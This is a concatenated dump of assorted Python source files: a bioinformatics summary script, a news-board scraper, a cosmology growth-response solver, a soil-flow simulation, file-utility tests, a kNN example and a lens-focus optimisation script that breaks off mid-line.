Germline.get_germline_dict(Germline.get_germlines('IGKJ'))\n\n\tpprint.pprint(dict_germlines_IGHV.keys())\n\tpprint.pprint(dict_germlines_IGHJ.keys())\n\tpprint.pprint(dict_germlines_IGKV.keys())\n\tpprint.pprint(dict_germlines_IGKJ.keys())\n\n\tHEADER = 'SAMPLE ID\\tAA\\tCOPY\\tMUTATION\\tLENGTH\\tV GENE\\tV REGION\\tJ JENE\\tJ REGION\\tREAD\\n'\n\t\n\tINDEX_NB_OF_SEQUENCE_ID = 1\n\tINDEX_NB_OF_MUTATION = 7\n\twith open(imgt_res_IgH_name) as imgt_res_IgH:\n\t\twith open('./data/IgH_summary.txt', 'w') as csv_res:\n\t\t\tcsv_res.write(HEADER)\n\t\t\treader = csv.reader(imgt_res_IgH, delimiter='\\t')\n\t\t\treader.next() #read through header\n\t\t\tfor d in reader:\n\t\t\t\tsequence_id = d[INDEX_NB_OF_SEQUENCE_ID]\n\t\t\t\tnb_of_mutation = re.sub(r'\\(.*\\)', '', d[INDEX_NB_OF_MUTATION])\n\t\t\t\td = fetch_original_data(sequence_id, dict, file_paths)\n\t\t\t\tcsv_res.write(make_output(sequence_id, d, nb_of_mutation, dict_germlines_IGHV, dict_germlines_IGHJ))\n\n\twith open(imgt_res_IgK_name) as imgt_res_IgK:\n\t\twith open('./data/IgK_summary.txt', 'w') as csv_res:\n\t\t\tcsv_res.write(HEADER)\n\t\t\treader = csv.reader(imgt_res_IgK, delimiter='\\t')\n\t\t\treader.next() #read through header\n\t\t\tfor d in reader:\n\t\t\t\tsequence_id = d[INDEX_NB_OF_SEQUENCE_ID]\n\t\t\t\tnb_of_mutation = re.sub(r'\\(.*\\)', '', d[INDEX_NB_OF_MUTATION])\n\t\t\t\td = fetch_original_data(sequence_id, dict, file_paths)\n\t\t\t\tcsv_res.write(make_output(sequence_id, d, nb_of_mutation, dict_germlines_IGKV, dict_germlines_IGKJ))\n","sub_path":"IMGT_Input/fetch_data.py","file_name":"fetch_data.py","file_ext":"py","file_size_in_byte":5735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"388287238","text":"from bs4 import BeautifulSoup\nfrom url_parser import URLparser\nfrom url_list import List\nfrom post_wash import post_wash\nimport datetime\nfrom date_cut import date_cut\nimport tag\nfrom img_size import img_size\n\n\n\n#게시판 bs_page 을 받으면, 그 페이지의 bs_page 반환\ndef Parsing_list_url(URL, bs_page):\n\tList = []\n\n\tList.append(bs_page)\n\n\treturn List\n\n\n\n#포스트 url을 받으면, 그 포스트의 정보를 dictionary 형태로 반환\ndef Parsing_post_data(bs, URL):\n\tpost_data_prepare = []\n\tend_date = date_cut(URL['info'])\n\n\tposts = bs.findAll(\"div\", {\"class\": \"item article\"})\n\n\tfor post in posts:\n\t\tpost_infoes = post.findAll(\"a\")\t#td 묶음\n\n\t\tpost_data = {}\n\t\ttry:\n\t\t\ttitle = post_infoes[0].get_text(\" \", strip = True)\n\t\t\tauthor = post.find(\"strong\").text.strip()\n\t\t\tif author.find(\"관리자\") != -1:\n\t\t\t\tauthor = \"0\"\n\t\t\tdate = post.find(\"span\", {\"class\": \"date\"})\n\t\t\tdate = str(date).split(\">\")[1]\n\t\t\tdate = str(date).split(\"<\")[0]\n\t\t\tdate = date + \" 00:00:00\"\n\t\texcept:\n\t\t\ttitle = post_infoes[0].get_text(\" \", strip = True)\n\t\t\ttry:\n\t\t\t\tauthor = post.find(\"strong\").text.strip()\n\t\t\texcept:\n\t\t\t\tauthor = \"0\"\n\t\t\tif author.find(\"관리자\") != -1:\n\t\t\t\tauthor = \"0\"\n\t\t\tdate = post.find(\"span\", {\"class\": \"date\"})\n\t\t\tdate = str(date).split(\">\")[1]\n\t\t\tdate = str(date).split(\"<\")[0]\n\t\t\tdate = date + \" 00:00:00\"\n\t\ttry:\n\t\t\tdate = str(datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M:%S\"))\n\t\texcept:\n\t\t\tdate = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n\t\t\tdate = date + \" 00:00:00\"\n\t\ttry:\n\t\t\tphrase = post_infoes[1].get_text(\" \", strip = True)\n\t\texcept:\n\t\t\tphrase = \"0\"\n\t\tphrase = post_wash(phrase)\n\t\ttag_done = tag.tagging(URL, title)\n\t\turl = post.find(\"a\")[\"href\"]\n\t\t#뉴스 url 에 들어가서 img를 가져오기위한 작업\n\t\tdomain = Domain_check(url)\t#뉴스 url 도메인\n\t\tdriver_page = URLparser(url)\n\t\tbs_page = BeautifulSoup(driver_page, 'html.parser')\n\t\ttry:\n\t\t\timg = bs_page.find(\"head\").find(\"meta\", {\"property\": \"og:image\"})['content']\n\t\texcept:\n\t\t\ttry:\n\t\t\t\tif bs_page.find(\"body\").find(\"img\") is None:\n\t\t\t\t\timg = 1\n\t\t\t\telse:\n\t\t\t\t\timg = bs_page.find(\"body\").find(\"img\")['src']\n\t\t\t\t\tif 1000 <= len(img):\n\t\t\t\t\t\timg = 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif img.startswith(\"http://\") or img.startswith(\"https://\"):\t\t# img가 내부링크인지 외부 링크인지 판단.\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\telif img.startswith(\"//\"):\n\t\t\t\t\t\t\timg = \"http:\" + img\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\timg = domain + img\n\t\t\texcept:\n\t\t\t\t img = 1\n\t\tif img != 1:\n\t\t\tif img_size(img):\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\timg = 1\n\n\t\tpost_data['title'] = title.upper()\n\t\tpost_data['author'] = author.upper()\n\t\tpost_data['date'] = date\n\t\tpost_data['post'] = phrase.lower()\n\t\tpost_data['tag'] = tag_done\t\t# 태그1/태그2/태그3/태그4/.../ 같은 형식의 태그string이 들어간다.\n\t\tpost_data['img'] = img\n\t\tpost_data['url'] = url\n\n\t\tprint(date, \"::::\", title)\n\n\t\t#게시물의 날짜가 end_date 보다 옛날 글이면 continue, 최신 글이면 append\n\t\tif str(date) <= end_date:\n\t\t\tcontinue\n\t\telse:\n\t\t\tpost_data_prepare.append(post_data)\n\t\t\t\n\treturn post_data_prepare\n\n\n\n#url을 받으면 Page를 변환시켜서, 변환된 url 반환\ndef Change_page(url, page):\n\turl_done = url + str(page)\n\n\treturn url_done\n\n\n#입력된 url의 도메인 url 반환\ndef Domain_check(url):\n\tdomain = url.split('/')[0] + '//' + url.split('/')[2]\t#도메인 url 추출\n\n\treturn domain","sub_path":"src/sj_crawling/sj8.py","file_name":"sj8.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"343327981","text":"import numpy as np\nfrom scipy.integrate import ode\nfrom scipy.interpolate import interp1d\nimport warnings\n\nclass SeparateUniverseGrowthResponse2(object) :\n\t'''\n\tComputes time evolutions of the separate universe growth response sourced by linear CDM+baryon perturbations\n\tprecomputed in an instance of classy.Class. The growth response can be computed at each wave number tabulated\n\tin the transfer function interpolation tables accessed using Class.get_transfer. \n\t'''\n\tdef __init__(self, cls, quiet = False) :\n\t\t'''\n\t\tInitialization requires an instance of classy.Class that has 'output':'mTk, vTk' and 'z_pk' set early enough\n\t\tfor the initial conditions chosen in the SeparateUniverseGrowthResponse.getGrowthResponse method. The instance of\n\t\tclassy.Class must already be computed.\n\t\t'''\n\t\tself.cls = cls\n\t\tself.quiet = quiet\n\t\tif 'gauge' in cls.pars and ('new' in cls.pars['gauge'] or 'New' in cls.pars['gauge']) :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must be computed in the synchronous gause')\n\t\tif not 'vTk' in self.cls.pars['output'] or not ('mTk' in self.cls.pars['output'] or 'dTk' in self.cls.pars['output']) :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class \\'output\\' must contain \\'mTk\\' and \\'vTk\\'')\n\t\tif self.cls.pars['extra_metric_transfer_functions'] != 'yes' :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must have \\'extra_metric_transfer_functions\\':\\'yes\\'')\n\t\tif 'z_pk' in self.cls.pars :\n\t\t\tself.z_max = np.max([float(tz) for tz in str( self.cls.pars['z_pk']).split(',')])\n\t\t\tif 'z_max_pk' in self.cls.pars :\n\t\t\t\tself.z_max = np.max([float(self.cls.pars['z_max_pk']), self.z_max])\n\t\telif 'z_max_pk' in self.cls.pars :\n\t\t\t\tself.z_max = float(self.cls.pars['z_max_pk'])\n\t\telse :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must have \\'z_pk\\' or \\'z_max_pk\\'')\n\t\tif self.cls.get_transfer() == {} :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse instance of classy.Class must be computed before initialization')\t\t\n\t\t#\n\t\t# Background\n\t\t#\n\t\tbg_loga = -np.log(1. + self.cls.get_background()['z'])\n\t\tbg_loga[-1] = 0.\n\t\tself.fb = self.cls.Omega_b() / (self.cls.Omega_b() + self.cls.Omega0_cdm())\n\t\tself.fc = 1. - self.fb\n\t\tself.H = interp1d(bg_loga, self.cls.get_background()['H [1/Mpc]'])\n\t\tself.zeq = self.cls.z_eq()\n\t\tif self.zeq > self.z_max and not self.quiet:\n\t\t\twarnings.warn('SeparateUniverseGrowthResponse.__init__ instance of classy.Class does not compute perturbations early enough' +\n\t\t\t\t\t\t 'for radiation dominated era initial conditions')\n\t\t#\n\t\t# Separate universe growth response ODE coefficients\n\t\t#\n\t\tf = self.cls.get_background()['gr.fac. f']\n\t\tw = self.cls.get_background()['(.)p_tot'] / self.cls.get_background()['(.)rho_tot']\n\t\tOmega_cb = (self.cls.get_background()['(.)rho_cdm'] + self.cls.get_background()['(.)rho_b']) / self.cls.get_background()['(.)rho_crit']\n\t\tself.drag = interp1d(bg_loga, 0.5 * (1. - 3. * w + 4. * f))\n\t\tself.source1 = interp1d(bg_loga, 1.5 * Omega_cb)\n\t\tself.source2 = interp1d(bg_loga, 2. / 3. * f)\n\t\t#\n\t\t# Thermodynamics\n\t\t#\n\t\tth_loga = -np.log(1. + self.cls.get_thermodynamics()['z'])\n\t\tself.w_b = interp1d(th_loga, self.cls.get_thermodynamics()['w_b'])\n\t\tself.c2_b = interp1d(th_loga, self.cls.get_thermodynamics()['c_b^2'])\n\t\t\n\tdef getSourceMode(self, loga, k_ind) :\n\t\t'''\n\t\tInterpolates the CDM+baryon perturbation and its first derivative with respect to log(a) for the mode \n\t\twhose wave number is self.cls.get_transfer(z)['k (h/Mpc)'][k_ind] at log-scale factor log(a) = loga\n\t\t'''\n\t\tz = np.exp(-loga) - 1.\n\t\ttry :\n\t\t\tH = self.H(loga)\n\t\t\tc2_b = self.c2_b(loga)\n\t\t\tw_b = self.w_b(loga)\n\t\t\ttf = self.cls.get_transfer(z)\n\t\texcept ValueError as e :\n\t\t\traise Exception(\"Error, redshift %.6e out of interpolation bounds\", z)\n\t\tdelta_cdm = -tf['d_cdm'][k_ind]\n\t\td_delta_cdm_d_loga = 0.5 * tf['h_prime'][k_ind] * (1. + z) / self.H(loga)\n\t\tdelta_b = -tf['d_b'][k_ind]\n\t\td_delta_b_d_loga = -0. * (c2_b - w_b) * delta_b + (1. + w_b) * (tf['t_b'][k_ind] * (1. + z) / H + d_delta_cdm_d_loga)\n\t\treturn self.fc * delta_cdm + self.fb * delta_b, self.fc * d_delta_cdm_d_loga + self.fb * d_delta_b_d_loga\n\n\tdef getGrowthResponse(self, k_ind, logai = None, dloga = 1.e-2, nstep = 100, rtol = 1.e-3, atol = 1.e-10) :\n\t\t'''\n\t\tNumerically integrates the second order ODE for the time evolution of the separate universe\n\t\tgrowth response sourced by a linear CDM+baryon mode with wave length self.cls.get_transfer(z)['k (h/Mpc)'][k_ind].\n\t\tInitial conditions are set during radition domination, so loga should not be set too late or the numerical\n\t\tsolution with have a transcient contribution. \n\t\t'''\n\t\tif logai == None :\n\t\t\tlogai = -np.log(self.z_max + 1.)\n\t\telif self.zeq > 1. / np.exp(logai) - 1. and not self.quiet :\n\t\t\t warnings.warn('SeparateUniverseGrowthResponse.getGrowthResponse initial time logai not early enough for radiation dominated era initial conditions')\n\t\tif self.z_max < 1. / np.exp(logai) - 1. :\n\t\t\traise Exception('Error: SeparateUniverseGrowthResponse.getGrowthResponse initial time too early')\n\t\tdelta_l, d_delta_l_d_loga = self.getSourceMode(logai, k_ind)\n\t\tfi = 3. / 2. * self.source2(logai)\n\t\tRi = fi / (1. + fi) / 3. * delta_l\n\t\tdRi = 2. * Ri\n\t\tdef getGrowthResponseDEQs(loga, state) :\n\t\t\t'''\n\t\t\tSecond order ODE for separate universe growth response sourced by linear mode delta_l\n\t\t\t'''\n\t\t\tif loga > 0. :\n\t\t\t\tloga = 0.\n\t\t\tR, dR = state\n\t\t\tdelta_l, d_delta_l_d_loga = self.getSourceMode(loga, k_ind)\n\t\t\tdeqs = np.zeros(2)\n\t\t\tdeqs[0] = dR\n\t\t\tdeqs[1] = - self.drag(loga) * dR + self.source1(loga) * delta_l + self.source2(loga) * d_delta_l_d_loga\n\t\t\treturn deqs\n\t\t#\n\t\t# Set up integrator and integrate over log(a)\n\t\t#\n\t\tgrowth_response_ode = ode(getGrowthResponseDEQs)\n\t\tgrowth_response_ode.set_integrator('lsoda', nsteps = nstep, rtol = rtol, atol = atol)\n\t\tgrowth_response_ode.set_initial_value([Ri, dRi], logai)\n\t\tlogas = [logai]\n\t\tRs = [Ri]\n\t\tstop_time = -2. * dloga\n\t\twhile growth_response_ode.t < stop_time :\n\t\t\tgrowth_response_ode.integrate(growth_response_ode.t + dloga)\n\t\t\tif not growth_response_ode.successful() :\n\t\t\t\tif not self.quiet :\n\t\t\t\t\twarnings.warn(\"SeparateUniverseGrowthResponse.getGrowthResponse failed to integrate at log(a) = %.6e\" % (growth_response_ode.t))\n\t\t\t\tbreak\n\t\t\tlogas.append(growth_response_ode.t)\n\t\t\tRs.append(growth_response_ode.y[0])\n\t\tgrowth_response_ode.integrate(0.)\n\t\tif growth_response_ode.successful() :\n\t\t\tlogas.append(growth_response_ode.t)\n\t\t\tRs.append(growth_response_ode.y[0])\t \n\t\tlogas = np.array(logas)\n\t\tRs = np.array(Rs)\n\t\tdelta_ls = np.array([self.getSourceMode(loga, k_ind)[0] for loga in logas])\n\t\treturn logas, Rs / delta_ls","sub_path":"SeparateUniverseGrowthResponseTest.py","file_name":"SeparateUniverseGrowthResponseTest.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"275722085","text":"from waterflow.flow1d.flowFE1d import Flow1DFE\nfrom waterflow.utility import conductivityfunctions as condf\nfrom waterflow.utility import fluxfunctions as fluxf\nfrom waterflow.utility.helper import initializer\nfrom waterflow.utility.spacing import biasedspacing\nfrom waterflow.utility.plotting import quickplot, solverplot\nsoil, *_ = condf.soilselector([13])[0]\ntheta_r, theta_s, ksat, alpha, n = (soil.t_res, soil.t_sat, soil.ksat, soil.alpha, soil.n)\nL = 100\nnx = 51\nxsp = biasedspacing(nx, power=1, rb=-L)[::-1]\ninitial_states = np.repeat(0, nx)\ntheta_h = initializer(condf.VG_pressureh, theta_r=theta_r, theta_s=theta_s, a=alpha, n=n)\nconductivity_func = initializer(condf.VG_conductivity, ksat=ksat, a=alpha, n=n)\nstorage_change = initializer(fluxf.storage_change, fun=theta_h)\nM = Flow1DFE('Unsaturated transient model')\nM.set_field1d(nodes=xsp)\nM.set_gaussian_quadrature(2)\nM.set_initial_states(initial_states)\nM.set_systemfluxfunction(fluxf.richards_equation, kfun=conductivity_func)\nM.add_dirichlet_BC(0.0, 'west')\nM.add_neumann_BC(-0.3, 'east')\nM.add_spatialflux(-0.01, 'extraction')\nM.add_pointflux(-0.03, -5.5, 'pflux')\nM.add_spatialflux(storage_change)\nM.tfun = theta_h\nM.solve(dt=0.01, end_time=15)\nM.transient_dataframeify()\nsolverplot(M)\nplt.tight_layout()\nplt.show()","sub_path":"docs/source/_build/html/index_examples-1.py","file_name":"index_examples-1.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286243698","text":"#!/usr/bin/env python\n# coding=utf-8\n'''\n * @File : test_file_util.py\n * @Time : 2020/04/28 14:07:04\n * @Author : Hanielxx\n * @Version : 1.0\n * @Desc : 测试file_util构件\n'''\n\nimport sys\nimport os\nsys.path.append(\"f:\\\\Learning\\\\siRNA\\\\Projects\\\\Tornado_LSTM\")\nprint(sys.path)\nfrom spl_sirna import file_util\nimport numpy as np\nimport pandas as pd\nos.chdir('f:\\\\Learning\\\\siRNA\\\\Projects\\\\Tornado_LSTM\\\\spl_test')\n\n\ndef test_get_data_from_file(args):\n '''\n Desc:\n 测试read file 监督学习中通用的读csv/excel的构件\n '''\n flag = True\n testRes = \"Return: \\n\"\n try:\n fp = os.path.join('spl_test\\\\', args[0])\n xname = None if args[1] == '' else args[1].split(\",\")\n yname = None if args[2] == '' else args[2]\n upper = True if args[3] == 'True' else False\n dropna = True if args[4] == 'True' else False\n encode = args[5]\n x, y = file_util.get_data_from_file(fp,\n xname=xname,\n yname=yname,\n upper=upper,\n dropna=dropna,\n encode=encode)\n res_x, res_y = x[:5], y[:5]\n testRes += \"xdata: {}\\nydata: {}\".format(res_x, res_y)\n except Exception as e:\n testRes += str(e)\n flag = False\n finally:\n logstring = \"rsc: get_data_from_file {}\".format(\n 'is ok' if flag else 'has bugs')\n print(\"logstring: \", logstring)\n testres = testres + \"\\n\" + logstring\n print(\"end test\")\n return testres\n\n\ndef test_write_csv_excel(args):\n '''\n Desc:\n write to file 通用的写csv/excel/txt文件构件\n '''\n flag = True\n testRes = \"Return: \\n\"\n try:\n data = args[0].split(',')\n fp = os.path.join('spl_test\\\\', args[1])\n columns = None if args[2] == 'None' else args[3].split(\",\")\n header = True if args[3] == 'True' else False\n sheet_name = args[4]\n nan_rep = args[5]\n encode = None if args[6] == 'None' else args[6]\n file_util.write_csv_excel(data, fp, columns, header, sheet_name,\n nan_rep, encode)\n except Exception as e:\n testRes += str(e)\n flag = False\n finally:\n logString = \"RSC: write_csv_excel is {}\".format(\n 'is OK' if flag else 'has bugs')\n print(\"logString: \", logString)\n testRes = testRes + \"\\n\" + logString\n print(\"End Test\")\n return testRes\n\n\nif __name__ == \"__main__\":\n # test_get_data_from_file()\n test_write_csv_excel(\n ['a,b,c,d', 'output.csv', 'None', 'False', 'None', 'NULL', 'None'])\n","sub_path":"spl_test/test_file_util.py","file_name":"test_file_util.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106313249","text":"__author__ = 'billhuang'\n\nimport numpy as np\nimport knn\nimport classifier as cf\nimport dist_utils as du\nimport kernel_utils as ku\n\nnp.random.seed(1234)\n\n# import train and test data\ndata = np.loadtxt('data.csv', delimiter = ',')\nnp.random.shuffle(data)\n\nsize = int(data.shape[0] / 2)\ntrain = data[:size, :]\ntest = data[size:, :]\n\ntrain_label_ = train[:, 0]\ntrain_features_ = train[:, 1:]\n\ntest_label_ = test[:, 0]\ntest_features_ = test[:, 1:]\n\n# K, number of nearest neighbors\nK = 3\n\n# distfunc, distance function (hamming, manhattan, square, euclidean, ...)\n# check dist_utils.py\ndistfunc = du.square\n\n# kernel, kernel for the weight in predicting label, rather than each\n# data point have 1 vote, check kernel_utils\nkernel = ku.no_kernel\n\n# classifier, based on probability or just pick the label with the highest\n# weight, check classifier.py\nclassifier = cf.hard_classifier\n\n# tie_breaker, pick dominant label in data set, or randomly pick one\n# check classifier.py\ntie_breaker = cf.dominating_label\n\npredictions = knn.KNN(K, train_label_, train_features_, test_features_,\n distfunc, kernel, classifier, tie_breaker)\n\nmisclassification_rate = np.sum(test_label_ != predictions) / (test_label_.size)\nprint(misclassification_rate)\n","sub_path":"k_nearest_neighbor/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"461670869","text":"def fetchTweets():\n\tf = open('KashmirTwitterData.txt', 'r')\n\tl = []\n\n\tfor line in f.readlines():\n\t\ttry:\n\t\t\t_id = line.split('\\t')[3].strip()\n\t\t\ttwt = line.split('\\t')[4].strip()\n\t\t\tl.append({_id: twt})\n\n\t\texcept IndexError:\n\t\t\tcontinue\n\n\tf.close()\n\n\treturn l\n\ndef main():\n\tl = fetchTweets()\n\tfor x in l :\n\t\tprint(x)\n\t\tprint('--------------------------')\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Tweet.py","file_name":"Tweet.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161357262","text":"# https://github.com/M0G1/Raytracing/blob/master/scripts/focus_setting_2_lens.py\nimport math as m\nimport time\nimport os\nimport pickle\n\nimport pylab\nimport numpy as np\nfrom scipy.optimize import minimize\nfrom typing import List, Tuple\n\nfrom surfaces.analitic.ellipse import Ellipse\nfrom ray.rays_pool import RaysPool\nfrom surfaces.limited_surface import LimitedSurface\nfrom tools.generators import Generator\nfrom ray.additional.ray_genenerator import generate_rays_from_line\n\nimport tools.help as help\nimport controllers.ray_pool_ctrl as rpmc\nimport view.matlab.matlab_surface_view2D as msv\nimport view.matlab.matlab_ray_view2D as mvray\n\nDELTA = 1e-15\nDELTA_2 = np.array((-DELTA, DELTA))\nfig_num = 0\n\n\ndef average(points: (list, tuple, iter)) -> np.ndarray:\n \"\"\"\n :param points: list of same dimensional point\n :return: average point for list of point\n \"\"\"\n p_aver = np.zeros(len(points[0]))\n for point in points:\n p_aver = np.add(p_aver, point)\n\n return np.divide(p_aver, len(points))\n\n\ndef get_sco_func(rays_pools: (tuple, list), refr_coef: float):\n \"\"\"\n Before use it methods you need calculate optical path in all RaysPool except last.\n The optical path must be calculating for ray in RaysPool and they must be same length\n :param rays_pools: list of RaysPool\n (length of iterable objects rays_pools and refr_coef must to match)\n :param refr_coef: refraction coefficient for last RaysPool in rays_pools\n :return: function of sco for searching focus and function of points cloud\n \"\"\"\n if not all(isinstance(val, RaysPool) for val in rays_pools):\n raise ValueError(\"Some element in argument ray_pool is not instance of RaysPool class\")\n # if not all(isinstance(val, (int, float)) and val > 0 for val in refr_coef):\n # raise AttributeError(\"Some element in argument refr_coef is not real positive number\")\n # if len(rays_pools) != len(refr_coef):\n # raise AttributeError(\n # \"Different length of rays_pools(%s) and refr_coef(%s)\" % (str(len(rays_pools)), str(len(refr_coef))))\n\n # optical path of ray\n # read from down to up\n ray_opt_paths = [\n [\n rays_pools[i].l(j)\n for j in range(len(rays_pools[i]))\n ]\n for i in range(len(rays_pools) - 1)\n ]\n # calc const\n ray_path_const = np.zeros(len(ray_opt_paths[0]))\n for i in range(len(ray_opt_paths)):\n ray_path_const = np.add(ray_path_const, ray_opt_paths[i])\n\n # define variables\n last_pool: RaysPool = rays_pools[len(rays_pools) - 1]\n # del some variables\n del ray_opt_paths\n\n # print(\"ray_path_const\", ray_path_const)\n # print(f\"\\nmax of ray_path_const {np.max(ray_path_const)}\\n\")\n\n # write the answer function\n\n def r(h: float):\n \"\"\"\n :param last_pool: RayPool with not parallel rays\n :param ray_path_const: sum of optical path others RaysPool\n :param h: length of ray\n :return: list of point\n \"\"\"\n # read from down to up\n # ans = []\n # for i in range(len(last_pool)):\n # step = (h - ray_path_const[i]) / refr_coef\n # val = last_pool.calc_point_of_ray(i, step)\n # ans.append(val)\n # return ans\n return [last_pool.calc_point_of_ray(i, (h - ray_path_const[i]) / refr_coef) for i in range(len(last_pool))]\n\n # return [last_pool.calc_point_of_ray(i, h) for i in range(len(last_pool))]\n\n def ans(h: float):\n \"\"\"\n This function used to calculate the sco of rays for length rays equal h\n : param h: length rays\n : return: sco of rays for length rays equal h\n \"\"\"\n # point for ray length - h\n p_ray = r(h)\n # average point (I don't sure that work)\n p_aver = average(p_ray)\n sco = 0\n for point in p_ray:\n p_sub = np.subtract(p_aver, point)\n sco = sco + np.matmul(p_sub, p_sub)\n return m.sqrt(sco / len(p_ray))\n\n return (ans, r)\n\n\ndef get_y_lim_ell_intersection(ab_coeff: (list, tuple), centers: (list, tuple), eps=1e-6):\n \"\"\"\n return y coordinate of ellipses intersection\n \"\"\"\n y_func = lambda x, ab, center: np.sqrt(1 - ((x - center[0]) / ab[0]) ** 2) * ab[1] + center[1]\n # x_func = lambda y, ab, center: np.sqrt(1 - ((y - center[1]) / ab[1]) ** 2) * ab[0] + center[0]\n x_border = [np.min([centers[0][0], centers[1][0]]), np.max([centers[0][0], centers[1][0]])]\n func = lambda x: np.abs(y_func(x, ab_coeff[0], centers[0]) - y_func(x, ab_coeff[1], centers[1]))\n argmin, f_min = help.min_golden_ratio(func, x_border[0], x_border[1], eps)\n\n return y_func(argmin, ab_coeff[1], centers[1])\n\n\ndef renew_lim_ellipse(lim_ell: List[LimitedSurface], ab_s, center_s, eps=1e-6):\n # coordinate Y where 2 ellipse intersect\n y_lim_1 = get_y_lim_ell_intersection(ab_s[0:2], center_s[0:2], eps=1e-6) - eps * 100\n y_lim_2 = get_y_lim_ell_intersection(ab_s[2:4], center_s[2:4], eps=1e-6) - eps * 100\n limits1 = ((center_s[0][0] - ab_s[0][0], center_s[0][0]), (-y_lim_1, y_lim_1))\n limits2 = ((center_s[1][0], center_s[1][0] + ab_s[1][0]), (-y_lim_1, y_lim_1))\n limits3 = ((center_s[2][0] - ab_s[2][0], center_s[2][0]), (-y_lim_2, y_lim_2))\n limits4 = ((center_s[3][0], center_s[3][0] + ab_s[3][0]), (-y_lim_2, y_lim_2))\n limits = [limits1, limits2, limits3, limits4]\n limits = DELTA_2 + limits # make borders more a little. VERY IMPORTANT\n\n for i in range(4):\n lim_ell[i].surface.abc = ab_s[i]\n lim_ell[i].limits = limits[i]\n return lim_ell\n\n\ndef get_functional(needed_focus_point: np.ndarray, beg_ray_pool: RaysPool, lim_ell_: List[LimitedSurface], center_s,\n accuracy=1e-5, min_max_sco_val=(0, 100), logfile=open(\"focus_set.txt\", mode=\"a\"), iterat=0):\n \"\"\"\n return the minimazation functional\n \"\"\"\n\n logfile.write(\"\\n\\r\\n\\r\" + time.asctime() + \"\\n\")\n\n def functional(variables):\n \"\"\"\n return np.linalg.norm(np.subtract(focus_point, needed_focus_point)),\n sco_f, r1, h, val, focus_point\n \"\"\"\n # 8 dim func. 4 ellipses with 2 coefficients in each.\n # set the ellipses coefficients\n variables = np.reshape(variables, (4, 2))\n lim_ell = renew_lim_ellipse(lim_ell_, variables, center_s)\n # modeling and calculating optical path\n # pools = rpmc.tracing_rayspool_ordered_surface(pool, lim_ell)\n pools = rpmc.tracing_rayspool_ordered_surface(beg_ray_pool, lim_ell, is_set_optical_path=True)\n # find the refraction coefficient(refractive_indexes) there goes the last RaysPool\n last_RaysPool: RaysPool = pools[len(pools) - 1]\n # index 0 and length DELTA = 0.1 are random\n T_val = 0.1\n point = last_RaysPool.calc_point_of_ray(0, T_val)\n refr_coef = lim_ell[len(lim_ell) - 1].get_refractive_indexes(point)[0]\n\n # getting the sco function and point cloud for constant optical length\n sco_f, r1 = get_sco_func(pools, refr_coef)\n # minimize the sco\n # properties a and b are random!!!!!\n h, val = help.min_golden_ratio(sco_f, *min_max_sco_val, accuracy)\n points = r1(h)\n focus_point = average(points)\n variables = variables.ravel()\n diff_bet_focus = np.linalg.norm(np.subtract(focus_point, needed_focus_point))\n print(f\"variables(a1,b1,...,a4,b4): {variables}\\nfocus {focus_point} {diff_bet_focus}\", file=logfile)\n print(f\"variables(a1,b1,...,a4,b4): {variables}\\nfocus {focus_point} {diff_bet_focus}\")\n\n return diff_bet_focus, pools, sco_f, r1, h, val, focus_point\n\n return functional\n\n\ndef main():\n logfile = open(\"focus_set.txt\", mode=\"a\")\n maxiter = 260\n # set 2 iter and launch\n\n ab_1_1 = (0.8, 3)\n ab_1_2 = (1, 3)\n ab_2_1 = (0.8, 3)\n ab_2_2 = (1, 3)\n ab_s = [ab_1_1, ab_1_2, ab_2_1, ab_2_2]\n # ab_s = np.asarray([0.84669971, 2.93134167, 1.04711517, 2.67583118, 0.83392378, 2.89171014, 1.04025161, 2.98363328])\n # ab_s = np.asarray([0.87053379, 2.92960797, 1.05378818, 2.65834648, 0.83555828, 2.90351797, 1.05212543, 2.97412832])\n # ab_s = ab_s.reshape((4, 2))\n\n # distance between centers\n r0_1 = 0.5\n r0_2 = 0.5\n dis_bet_lens = 1 # distance between lens\n # illustration\n # / \\ / \\\n # \\---r0_1---/---dis_bet_lens---\\---r0_2---/\n # 1 2 3 4\n # 0 1 2 3 - indexs\n # ----------------------------------------> X axis\n center2 = (0, 0)\n center1 = (center2[0] + r0_1, 0)\n center4 = (center2[0] + ab_s[1][0] + dis_bet_lens + ab_s[3][0], 0)\n # center4 = (center1[0] + ab_s[1][0] + dis_bet_lens + ab_s[3][0], 0)# Think about it\n center3 = (center4[0] + r0_2, 0)\n center_s = (center1, center2, center3, center4)\n print(\"ell centers \",center_s)\n # n1 - outside of len, n2 - inside of len, n3 - inside of len.\n n1 = 1\n n2 = 1.33\n n3 = 1.33\n n_len = (n2, n3)\n\n ellipsis = [Ellipse(center_s[i], ab_s[i], Ellipse.types.REFRACTING, n1=n1, n2=n_len[i // 2]) for i in range(4)]\n\n y_lim_1 = 2.8 # coordinate Y where 2 ellipse intersect\n y_lim_2 = 2.8\n limits1 = ((center1[0] - ab_s[0][0], center1[0]), (-y_lim_1, y_lim_1))\n limits2 = ((center2[0], 